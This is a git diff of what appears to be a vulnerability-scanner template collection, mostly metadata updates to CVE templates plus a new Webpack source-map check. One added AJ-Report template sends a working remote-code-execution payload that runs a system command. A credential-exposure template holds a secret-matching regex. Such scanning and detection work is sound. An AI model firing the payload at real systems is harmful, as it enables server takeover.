https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + metadata: + max-request: 2 tags: dast,xxe variables: @@ -49,4 +51,4 @@ http: part: body words: - 'for 16-bit app support' -# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml index 3a3c25aae2..08ac78ddff 100644 --- a/dns/bimi-detect.yaml +++ b/dns/bimi-detect.yaml @@ -1,15 +1,16 @@ id: bimi-record-detect -info: - name: BIMI Record - Detection - author: rxerium - severity: info - description: | - A BIMI record was detected - reference: - - https://postmarkapp.com/blog/what-the-heck-is-bimi - tags: dns,bimi - +info: + name: BIMI Record - Detection + author: rxerium + severity: info + description: | + A BIMI record was detected + reference: + - https://postmarkapp.com/blog/what-the-heck-is-bimi + metadata: + max-request: 1 + tags: dns,bimi dns: - name: "{{FQDN}}" type: TXT @@ -22,4 +23,4 @@ dns: - type: regex regex: - "v=BIMI1(.+)" -# digest: 4a0a004730450221008445fc238e87f9342ce983f65c136755a858f4b59106a74fe0a685b7cbc0d9d20220723212d91ee35908c09375b9eef99966b5c4e47ca3d5dab26b2013f76ff5891e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220605ed411689a170cf998da54d5e46492d87ddd699d4e863af5c74ab042d84f26022100d1dcec6514e480b66731a11ee26545bc301c8a6aa7c25d90e0ffce2da14dae54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/keys/credential-exposure-file.yaml b/file/keys/credential-exposure-file.yaml index 25e80b108c..217f10b52f 100644 --- a/file/keys/credential-exposure-file.yaml +++ b/file/keys/credential-exposure-file.yaml @@ -5,7 +5,7 @@ info: author: Sy3Omda,geeknik,forgedhallpass,ayadi severity: unknown description: Check for multiple keys/tokens/passwords hidden inside of files. - tags: exposure,token,file,disclosure + tags: exposure,token,file,disclosure,keys # Extract secrets regex like api keys, password, token, etc ... for different services. # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. @@ -3465,4 +3465,4 @@ file: - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" # Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100b72b69d337c25863bb7f860b4a6811ae2eefe0dd86e750fec9e74e84acbe9f61022035683b418d60d3eadb52eafc6261e03e9eb0e08e2c6f0f3d51bf38f43da64e66:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220045ec05e89307c40d97b871dedb06fc2e6c29e7f9472652f27a3af78cbb47c6a0221008aa1c6521a840b9f7dbf8e4c0f83863894011561e0d3d244858683684293f221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index d842083a34..e5d69c5394 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: smartbear product: swagger_ui - shodan-query: http.component:"Swagger" + shodan-query: + - http.component:"Swagger" + - http.component:"swagger" + - http.favicon.hash:"-1180440057" fofa-query: icon_hash="-1180440057" tags: headless,cve,cve2018,swagger,xss,smartbear headless: @@ -70,4 +73,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4b0a004830460221008c5bb8afdc142dbf782c9bb579a7ed08079c67387a1285aaa34a20bd5f67a8e9022100905594915fd641bd07174ef818dd215bc18bc32845731f1aeb85ca745c8612e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b620185825b2c7dd85b7d2fb9e5863acfd2c2b606b86934fc08cbc8fc997be3022100d10e8cd09cbe237f829b10d1e0a5226cf9e34a7a2c007f3e53029cae7f920b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml new file mode 100644 index 0000000000..8b735dea8c --- /dev/null +++ b/headless/webpack-sourcemap.yaml @@ -0,0 +1,222 @@ +id: webpack-sourcemap + +info: + name: Webpack Sourcemap + author: lucky0x0d,PulseSecurity.co.nz + severity: low + description: | + Detects if Webpack source maps are exposed. + impact: | + Exposure of source maps can leak sensitive information about the application's source code and potentially aid attackers in identifying vulnerabilities. + remediation: | + Ensure that Webpack source maps are not exposed to the public by configuring the server to restrict access to them. + reference: + - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage + metadata: + max-request: 9 + tags: javascript,webpack,sourcemaps,headless +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + + - action: sleep + args: + duration: 10 + + - action: script + name: extract + args: + code: | + () => { + AAA = []; + window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); + BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] + CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] + return [...new Set([...AAA, ...BBB, ...CCC])]; + } + + extractors: + - type: regex + name: allscripts + internal: true + part: extract + regex: + - (?i)http(.[~a-zA-Z0-9.\/\-_:]+) +flow: | + headless(); + http("check_base_srcmap_inline"); + for (let scripturi of iterate(template["allscripts"])) { + set ("scripturi", scripturi); + http("check_for_srcmap_header"); + http("check_for_srcmap_inline"); + http("check_for_srcmap_url"); + for (let mapuri of iterate(template["allmaps"])) { + set ("mapuri", mapuri); + http("fetch_absolute_srcmap"); + http("fetch_relative_srcmap"); + http("fetch_root_relative_srcmap"); + http("fetch_noscheme_srcmaps"); + }; + set ("allmaps", null); + }; + +http: + - method: GET + id: check_base_srcmap_inline + disable-cookie: true + redirects: true + path: + - '{{BaseURL}}' + + matchers: + - type: regex + name: Inline_SourceMap + regex: + - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo' + + - type: regex + name: SourceMapConsumer_Present + regex: + - '(?i)SourceMapConsumer' + + - method: GET + id: check_for_srcmap_url + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + extractors: + - type: regex + name: allmaps + internal: true + group: 1 + regex: + - (?i)\/\/#\ssourceMappingURL=(.[~a-zA-Z0-9.\/\-_:]+) + + - method: GET + id: check_for_srcmap_inline + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + matchers: + - type: regex + name: Inline_SourceMap + regex: + - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo' + + - type: regex + name: SourceMapConsumer_Present + regex: + - '(?i)SourceMapConsumer' + + - method: GET + id: check_for_srcmap_header + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + matchers: + - type: dsl + name: Source_Map_Header + dsl: + - "regex('(?i)SourceMap', header)" + - "status_code != 301 && status_code != 302" + condition: and + + extractors: + - type: kval + kval: + - X_SourceMap + - SourceMap + + - method: GET + id: fetch_absolute_srcmap + disable-cookie: true + redirects: true + path: + - '{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + + - type: status + status: + - 200 + + - method: GET + id: fetch_relative_srcmap + disable-cookie: true + redirects: true + path: + - '{{replace_regex(scripturi,"([^/]+$)","")}}{{replace_regex(mapuri,"(^\/+)","")}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + + - type: status + status: + - 200 + + - method: GET + id: fetch_root_relative_srcmap + disable-cookie: true + redirects: true + path: + - '{{replace_regex(scripturi,replace_regex(scripturi,"http.+//[^/]+",""),"")}}{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + + - type: status + status: + - 200 + + - method: GET + id: fetch_noscheme_srcmaps + disable-cookie: true + redirects: true + path: + - '{{Scheme}}{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + + - type: status + status: + - 200 +# digest: 4a0a004730450220010b004e9a80e7bcef4de9826e973992a8ea72217ce2d6813700f1aceded13db0221008b37c8a048d1a96621dae497d9241f2ee0b8920f952cfa6d9f92a69715504fff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index 832b701428..982503c4a8 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -2,16 +2,15 @@ id: CNVD-2017-06001 info: name: Dahua DSS - SQL Injection - severity: high author: napgh0st,ritikchaddha + severity: high reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001 metadata: - max-request: 1 verified: true - fofa-query: app="dahua-DSS" + max-request: 2 + fofa-query: "app=\"dahua-DSS\"" tags: cnvd,cnvd2017,sqli,dahua - variables: num: "999999999" @@ -34,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201473c48150a393eeb0801323af0b0e94147a66a15315b3c0cb476027ce5f6c880220684bd14e88b482a6ed2d4707b2bef6916911ba91ca0cb9fe97f6396c14476607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 5db72977bb..a15454eb23 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -15,9 +15,8 @@ info: cvss-score: 10 cwe-id: CWE-77 metadata: - max-request: 1 + max-request: 2 tags: cnvd,cnvd2019,rce,catfishcms - flow: http(1) && http(2) http: @@ -48,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d570edc7b33b2580048fec77b6b2f9f0d57f868585cae9342aab99effc8360cf022100ed0064a22046fe4db93c24d2342e3f3cab562c91cb7ef94b03b1ba4eefdc35bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006fbcd11636dfc6b0b78088e94cfe495bc28c0d9eaa663e0ef65303287ed924a022100cb422c04283414be90778be5b8712e505251da233859464e47659f678fb14826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml new file mode 100644 index 0000000000..204334b5b4 --- /dev/null +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -0,0 +1,45 @@ +id: CNVD-2024-15077 + +info: + name: AJ-Report Open Source Data Screen - Remote Code Execution + author: pussycat0x + severity: high + description: | + AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious. + reference: + - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md + metadata: + verified: true + max-request: 1 + fofa-query: title="AJ-Report" + tags: cnvd,cnvd2024,aj-report,rce + +http: + - raw: + - | + POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Content-Type: application/json;charset=UTF-8 + + {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "code" + - "data" + condition: and + + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 1017ec6d7c..913da2da7b 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.15958 - epss-percentile: 0.95829 + epss-percentile: 0.95958 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: internet_information_server + shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" tags: cve,cve2000,frontpage,microsoft,edb http: @@ -43,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205feaaedc7212d5546b4a1e2b1f6d701d77390a9a19a31d6f45a9150b0da0080a02203ffb16ad768f80c2d873647321189e4c6fa3eff77f84fbc18a3d04d5b7c714f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 57d6042605..c3fdc5daa7 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -22,14 +22,17 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.87683 - epss-percentile: 0.98569 + epss-percentile: 0.98644 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cisco product: ios - shodan-query: product:"Cisco IOS http config" && 200 + shodan-query: + - product:"Cisco IOS http config" && 200 + - product:"cisco ios http config" + - cpe:"cpe:2.3:o:cisco:ios" tags: cve,cve2001,cisco,ios,auth-bypass http: @@ -50,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030dfd1dffb93aef87571c322ecdfc9aeef785a992efb1fbe3b847f1a23a4808602207ddca1c1fdfb4241fe6d05f8d1a531931450f32a8663883bd70541df6a93575f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0949ff5738..01e8e8440b 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -20,13 +20,18 @@ info: cvss-score: 7.5 cve-id: CVE-2002-1131 cwe-id: CWE-80 - epss-score: 0.06018 - epss-percentile: 0.92781 + epss-score: 0.04774 + epss-percentile: 0.92677 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: squirrelmail product: squirrelmail + shodan-query: + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: cve,cve2002,edb,xss,squirrelmail http: @@ -55,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f73612464ffbb40fb37890f6902c59fd670a8c57eb10a297b6ce6d7d7a68301022100a8ed74ff2523575fbbdb8d5a4a330d69c6a96ef8d97d911a20c1468dfa92aa2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc1ea6067e1a2f98cb58afb4fa1daf840e7eafc846b13bc838acc791c330201f022100ab6f25fab6b17ce9e8d5f114cf69a9403e49b9c67bbfe3d0027076173e390c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index c1f874a540..bed100152f 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 - http://marc.info/?l=bugtraq&m=108301983206107&w=2 - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966 + - https://github.com/POORVAJA-195/Nuclei-Analysis-main classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.84351 + epss-percentile: 0.84626 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed72c7aac1f09f263022943f85c3438ab7bc9d157d128cbef2639c033ff4162802207254eabebe6585d83a8abb17a6163edc0de13410f5bfc937fda5bd940a22f36e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 1293c3640f..7ac1ee56ff 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83623 + epss-percentile: 0.85053 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220023561509073a250a9589a0ef1039640f1a8e364c5893b9ebbfa32fab389dbef022051dbb9e24a672b7ca924059689d605544097318aa9d433aafdd646a6d4887282:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018445e34aa198d712b4c0d606f9c17f6dffee851b93d92af3ff4fae54f1219fc022000c602869ddf4f145703d0640aeb529459c69b8db67ba7cc27b27fa741d8e37d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 89f0e31e60..5bf2bf72f8 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other - epss-score: 0.02158 - epss-percentile: 0.88203 + epss-score: 0.01539 + epss-percentile: 0.87085 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b73417184338a145cd434067c3a5affab5f19d715ddcf840193794038d2fe9fc022100ad8926c7c03251c1cf3ed73d9a65bb5c3bee39ea572aad309043f945c6e6f935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 4488b0a43c..274c4e23a9 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -23,13 +23,16 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.897 + epss-percentile: 0.90695 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: sap_web_application_server - shodan-query: html:"SAP Business Server Pages Team" + shodan-query: + - html:"SAP Business Server Pages Team" + - http.html:"sap business server pages team" + fofa-query: body="sap business server pages team" tags: cve,cve2005,sap,redirect,business,xss http: @@ -42,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bad1415000d9c5decd3270a2f82a50046c87bade9cd7d0bdbdaa40ef258f537a02204ba93c8130015b87f275475c175389bf3b230381d099d0c5d084f48c9b46c357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 87657dbf27..13ff7bbbf0 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -20,13 +20,18 @@ info: cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - epss-score: 0.25691 - epss-percentile: 0.9628 + epss-score: 0.28102 + epss-percentile: 0.96839 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: squirrelmail product: squirrelmail + shodan-query: + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: cve,cve2006,lfi,squirrelmail,edb http: @@ -43,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e83bd6e716c336c1660d900f8c08653ace9865180909e88dc35b6180af0634d02205959ac5c89fa3aa04db1f64a614848f8a84c0604fe7f72bad1f63b1c99d8404b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206124e5c3a66ccbc824bf36c3a88b9d5ebbecb791b01bdf0f16ae403c057405a402201d902bd26db48d7aefe3ea9dd0461c2ae67d37fefd2af9f0bc4788d6d8314536:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index f3c5829a6c..6035d8bab5 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0093 - epss-percentile: 0.82626 + epss-percentile: 0.82973 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ece81e3272a6b93437d5876ec0f1346da324d72a43381b3fd9caca99c4051ad022100e4e03ce4d101a0b9f4fb82a0e85ad58d1ee55d277fb6a190888bb16b1dddb1c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 1a29f75867..54dfe7435b 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -21,17 +21,23 @@ info: cvss-score: 10 cve-id: CVE-2007-3010 cwe-id: CWE-20 - epss-score: 0.97317 - epss-percentile: 0.99868 + epss-score: 0.97313 + epss-percentile: 0.99874 cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:* metadata: verified: true max-request: 1 vendor: alcatel-lucent product: omnipcx - shodan-query: title:"OmniPCX for Enterprise" - fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise" - tags: cve,cve2007,kev,rce,alcatel + shodan-query: + - title:"OmniPCX for Enterprise" + - http.title:"omnipcx for enterprise" + fofa-query: + - app="Alcatel_Lucent-OmniPCX-Enterprise" + - app="alcatel_lucent-omnipcx-enterprise" + - title="omnipcx for enterprise" + google-query: intitle:"omnipcx for enterprise" + tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent http: - method: GET @@ -53,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5461b90f1703401d218da417966d156cdb851795019deb78cd43f70cb07ec6a022022e64196d18c50c25a32ba8e5bc6b0590867add3e6c725cae45d9cabf536f139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index a2a1196510..08115cea39 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2007-4504 cwe-id: CWE-22 - epss-score: 0.02599 - epss-percentile: 0.90043 + epss-score: 0.02171 + epss-percentile: 0.89338 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa8b85892e423c5bf35a3d7e57c7a6c92369087bccf959a8ad7952dc814ddd64022100e94750ab323e456ccb7dc737ab126a2d5c160b7190e3e70993be80dd1064a3b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index aee2258ec2..10f8f1198a 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - epss-score: 0.16469 - epss-percentile: 0.95873 + epss-score: 0.21361 + epss-percentile: 0.96419 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c4a8474be81263c4f0abab1f0fe57a6779f4cb1d748445fd08dc0dfab5c7131022060ca2bf20c392063d8c3f8c9e03e130f0aec84067f9af1e94c168c914dc21f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index fe0f7b48ec..13dafce379 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -20,14 +20,19 @@ info: cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 - epss-score: 0.02361 - epss-percentile: 0.88734 + epss-score: 0.0153 + epss-percentile: 0.87042 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin - shodan-query: http.title:"phpPgAdmin" + shodan-query: + - http.title:"phpPgAdmin" + - http.title:phppgadmin + - 